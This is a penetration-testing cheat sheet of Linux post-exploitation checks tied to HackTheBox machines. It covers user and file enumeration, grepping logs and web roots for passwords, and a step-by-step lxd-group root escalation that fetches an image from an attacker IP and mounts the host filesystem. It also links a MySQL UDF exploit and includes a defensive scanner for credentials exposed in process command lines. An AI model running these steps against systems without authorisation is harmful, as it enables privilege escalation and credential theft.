# Post Exploit Checks

## General Enumeration

* Know if the environment is a real host

```bash
ls -la / # a .dockerenv (or similar dot file) in / indicates a Docker container rather than a real host
hostname
```

* Know the permissions of the user

```bash
sudo -l
id
```

* Know the users

```bash
cat /etc/passwd
```

* Check for `.htaccess` files
* `/etc/apache2/sites-enabled/*`
* `/etc/nginx/nginx.conf`
* `/etc/ssh/sshd_config`
* Application-specific configs: wp-config, settings.php, etc.

## Groups Exploitation

### 4(adm)

* The adm group members can view the log files

```bash
cd /var/log
grep -EnRi password .
```

**Machine:**

* Academy - HTB : <https://www.youtube.com/watch?v=yQl5RA6APyQ&t=2620>
* Doctor - HTB : <https://youtube.com/watch?v=JcOR9krOPFY&t=1780>

### 116(lxd)

* Members of the lxd group can import a container image, start it as a privileged container and mount the host's `/` inside it, which exposes the host's `/root` (and everything else) from within the container

```bash
# attacker machine
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

# victim machine
lxd init # yes to all 
wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # Exp Output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # Exp Output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # shell will be obtained as root in the ignite container
cd /mnt/root # provides the root of the victim machine
```

## Files Enumeration

* Find suid binaries

```bash
find / -perm /4000 -ls 2>/dev/null
```

* Find Writeable files

```bash
find / -type f -writable 2>/dev/null | grep -v proc
```

* Find files owned by the user (group specific)

```bash
# ! -path <path> - omits files from the mentioned directory
# -group <group name> - group name
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null
```

* Locations to check

```bash
ls /opt
ls /usr/local/bin
ls ~/.local/bin
```

## Background Jobs Enumeration

* Crontabs

```bash
crontab -l
cat /etc/crontab
```

* Enumerate processes with [pspy](https://github.com/DominicBreuker/pspy)

## Network Enumeration

* Know the network adapters (the host might be talking to internal networks)

```bash
ip a
```

* Open Ports and services

```bash
netstat -antp
# look for unusual services listening only internally, e.g. a MySQL service bound to localhost
```

## Process Enumeration

* Enumerate the services that are running

```bash
ps aux
```

* Get more information about a process (its command-line arguments, which may contain passwords)

```bash
# take the process id from ps aux; cmdline is NUL-separated, so tr makes it readable
cat /proc/<processid>/cmdline | tr '\0' ' '; echo
```
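Added audit example (not from the original notes): the script below parses `/proc/<pid>/cmdline` the way the kernel writes it (NUL-separated, NUL-terminated, empty for kernel threads) and flags arguments that look like credentials, so an administrator can find the secrets that any local user could read the same way. The credential patterns, the `mysql -p` special case and the constructed sample are assumptions for illustration.

```python
import os
import re

# Argument shapes that usually carry a credential (assumed for this example;
# extend for the tools in your environment). mysql clients also take -pSECRET.
SECRET_PATTERNS = [re.compile(r"^--?(password|passwd|pass|token|secret|api[-_]?key)=", re.I)]
SECRET_FLAGS = {"-p", "--password", "--passwd", "--token", "--secret"}
MYSQL_CLIENTS = {"mysql", "mysqldump", "mysqladmin"}

def parse_cmdline(raw: bytes) -> list:
    """/proc/<pid>/cmdline is NUL-separated and NUL-terminated: strip only the
    final NUL so an empty argument survives; kernel threads (empty file) give []."""
    raw = raw[:-1] if raw.endswith(b"\x00") else raw
    return [a.decode("utf-8", "replace") for a in raw.split(b"\x00")] if raw else []

def find_secret_args(argv: list) -> list:
    """Return the argv entries that look like a credential."""
    if not argv:
        return []
    tool, hits = os.path.basename(argv[0]), []
    for i, arg in enumerate(argv[1:], start=1):
        if tool in MYSQL_CLIENTS and arg.startswith("-p") and len(arg) > 2:
            hits.append(arg)                      # password glued to -p, e.g. -pS3cret
        elif any(p.match(arg) for p in SECRET_PATTERNS):
            hits.append(arg)                      # e.g. --token=abc
        elif arg in SECRET_FLAGS and i + 1 < len(argv):
            hits.append(arg + " " + argv[i + 1])  # flag followed by its value
    return hits

def scan_proc(proc: str = "/proc") -> dict:
    """pid -> suspicious args for every process whose cmdline is readable."""
    findings = {}
    for entry in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(os.path.join(proc, entry, "cmdline"), "rb") as fh:
                hits = find_secret_args(parse_cmdline(fh.read()))
        except OSError:
            continue                              # process exited or unreadable
        if hits:
            findings[int(entry)] = hits
    return findings

# Constructed sample, not a real capture: /proc/<pid>/cmdline of "mysql -u wp -pS3cret wordpress".
SAMPLE_CMDLINE = b"mysql\x00-u\x00wp\x00-pS3cret\x00wordpress\x00"

if __name__ == "__main__":
    print(find_secret_args(parse_cmdline(SAMPLE_CMDLINE)))   # ['-pS3cret']
    print(sorted(scan_proc().items()))                       # what every other local user can see too
```

Processes found this way should receive their secrets from a configuration file with restricted permissions rather than on the command line; mounting `/proc` with `hidepid=2` additionally hides other users' process entries from unprivileged accounts.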

## Web Directories

* Check the web directories for passwords

```bash
# search the web roots for hard-coded credentials
grep -REni 'password' /var/www 2>/dev/null
```

## MySQL

* If MySQL is running as **root** on the machine, check for privilege escalation via a user-defined-function library
* <https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql#privilege-escalation-via-library>
* <https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py>
* Terminating a query with `\G` instead of `;` makes the mysql client print each row vertically (one column per line), which is far more readable for wide tables

```bash
# Connecting to mysql (a password prompt follows)
mysql -u root -p

# \G in place of ; prints every column of each row on its own line
mysql> select * from wp_users \G
```
